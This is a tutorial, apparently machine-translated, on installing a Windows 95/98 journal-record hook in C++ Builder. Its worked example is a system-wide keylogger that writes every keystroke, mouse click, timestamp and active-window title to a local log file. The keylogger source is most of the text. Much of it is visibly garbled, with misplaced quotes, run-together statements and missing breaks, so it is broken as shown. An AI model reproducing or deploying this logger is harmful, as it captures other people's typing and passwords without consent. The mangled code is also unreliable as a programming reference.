Use of WIN95 log hooks (Journalrecord hooks)

Hooks are a key element of the message processing mechanism in Windows, and by installing hooks, the application can set up appropriate subroutines to monitor message delivery in the system and process them before they reach the target window program. There are many kinds of hooks, each hook can intercept and process the corresponding messages, such as keyboard hooks can intercept keyboard messages, mouse hooks can intercept mouse messages, shell hooks can intercept the startup and shutdown application messages, log hooks can monitor and record input events. Hook is divided into thread-specific hooks and global hooks, thread-specific hooks only monitor the specified thread, to monitor all the threads in the system, you must use the global hook. For global hooks, the hook function must be contained in a separate dynamic-link library (DLL) so that it can be invoked by a variety of associated applications. In Windows, log hook is a very special hook, it has only the global hook one kind, the keyboard mouse and other input devices occur when the system message queue is taken out, and the system can only have one such log hook, more importantly, it does not need to use in the dynamic link library, This eliminates the hassle of creating a dynamic link library for installing a global hook. With log hooks, we can monitor various input events, and the following example can be used to record keyboard input and, when a key occurs, to automatically record the date and time of the key action and the name of the currently active window. This example compiles through in Chinese Win98,borland C + + Builder4.

----1. Create a new project, place two buttons Button1 and Button2 in the form FORM1, caption "Install Log Hook" and "Uninstall Log Hook" respectively.

----2. The following global variables are defined:

Hhook G_hloghook=null; Hook variable


HWND G_hlastfocus=null;


//Record last window handle with focus


const int keypressmask=0x80000000; Keyboard Mask Constants


Char G_prvchar; Save the last key value


3. In the Button1 onclick event, enter:


void __fastcall Tform1::button1click (tobject *sender)


{


if (g_hloghook==null)


G_hloghook = SetWindowsHookEx


(Wh_journalrecord,


(HookProc) Journallogproc,


hinstance,0); Install log Hook


}


4. In the Button2 onclick event, enter:


void __fastcall Tform1::button2click (tobject *sender)


{


if (g_hloghook!=null)


{UnhookWindowsHookEx (g_hloghook);


G_hloghook=null;


}//uninstall log Hook


}


5. Enter Hook callback function:


hookproc journallogproc (int icode,


WPARAM WPARAM, LPARAM LPARAM)


{


if (icode<0) return (HookProc) CallNextHookEx (G_hloghook,icode,wparam,lparam); if (icode= "=hc_action") "{eventmsg *pevt=" (eventmsg "*) lParam; int i; HWND Hfocus; Saves the current active window handle char sztitle[256]; Current window name Char sztime[128]; Saves the current date and time FILE *stream= "fopen" ("C:\\logfile.txt", "a+t"); "if (Pevt->message==wm_keydown)


{int Vkey=lobyte (pevt->paraml); Get Virtual Key value


Char ch;


Char str[10];


Hfocus=getactivewindow ();


//Get current active window handle


if (g_hlastfocus!=hfocus)


//Current active window changes


{GetWindowText (hfocus,sztitle,256);


G_hlastfocus=hfocus;


strcpy (Sztime,datetimetostr (now))


. C_STR ()); Get the current date time


fprintf (Stream, "%c%s%c%c%s",


10,sztime,32,32,sztitle); Write File


fprintf (Stream, "%c%c", 32,32);


　　　 }


int ishift=getkeystate (0x10);


//test Shift,caption,numlock whether the key is pressed


int icapital=getkeystate (0x14);


int inumlock=getkeystate (0X90);


bool Bshift= (Ishift & Keypressmask) ==keypressmask;


BOOL Bcapital= (Icapital & 1) ==1;


bool Bnumlock= (Inumlock & 1) ==1;


　　  if (vkey >=48 && vkey<=57)/digital 0-9 if (!bshift) fprintf (stream, "%c", vkey); if (vkey>=65 && vkey<=90)//A-Z-A-Z {if (!bcapital) if (bshift) ch= "vkey;" Else ch= "vkey+32;" Else if (Bshi FT) ch= "vkey+32" Else ch= "vkey;" fprintf (Stream, "%c", ch); } if (vkey>=96 && vkey<=105)//keypad 0-9 if (bnumlock) fprintf (stream, "%c", vkey-96+48); if (vkey>=186 && vkey<=222)//other key {switch (vkey) {case 186:if (!bshift) ch= ";"; else ch= ":"; Case 187:if (!bshift) ch= "="; else ch= "+"; Case 188:if (!bshift) ch= ","; else ch= "<"; Case 189:if (!bshift) ch= "-"; else Ch= "_"; Case 190:if (!bshift) ch= "."; else ch= ">"; Case 191:if (!bshift) ch= "/"; Else ch= "?"; Case 192:if (!bshift) ch= "'"; else ch= "~"; Case 219:if (!bshift) ch= "["; else ch= "{"; Case 220:if (!bshift) ch= "\"; else ch= "|"; Case 221:if (!bshift) ch= "]"; Else Ch= "}"; Case 222:if (!bshift) ch= "\"; ElseCh= "\" "; Default:ch= "n"; } if (ch!= "n") fprintf (Stream, "%c", ch); }//if (wparam>=112 && wparam<=123)/function key [F1]-[F12] if (vkey>=8 && vkey<=46)//direction key {switch (vkey) {Case 8:strcpy (str, ' [BK] '); break; case 9:strcpy (str, "[tab]"); break; case 13:strcpy (str, "[EN]"); STR, "[SP]"); Case 33:strcpy (str, "[PU]"); Case 34:strcpy (str, "[PD]"); Case 35:strcpy (str, "[end]"); Case 36:strcpy (str, "[Home]"); Case 37:strcpy (str, "[LF]"); Case 38:strcpy (str, "[UF]"); Case 39:strcpy (str, "[RF]"); Case 40:strcpy (str, "[DF]"); Case 45:strcpy (str, "[INS]"); Case 46:strcpy (str, "[DEL]"); Default:ch= "n"; } if (ch!= "n") {if (g_prvchar!= "Vkey)" {fprintf (Stream, "%s", str); g_prvchar= "Vkey"}}} } if (Pevt->message==wm_lbuttondown | | pevt->message


==wm_rbuttondown)


{Hfocus=getactivewindow ();


if (g_hlastfocus!=hfocus)


{g_hlastfocus=hfocus;


GetWindowText (hfocus,sztitle,256);


strcpy (Sztime,datetimetostr (now)). C_STR ());


//Get the current date time


fprintf (Stream, "%c%s%c%c%s",


10,sztime,32,32,sztitle); Write File


fprintf (Stream, "%c%c", 32,32);


　　　　 }


　　　 }


fclose (stream);


return (HOOKPROC) CallNextHookEx


(G_hloghook,icode,wparam,lparam);


}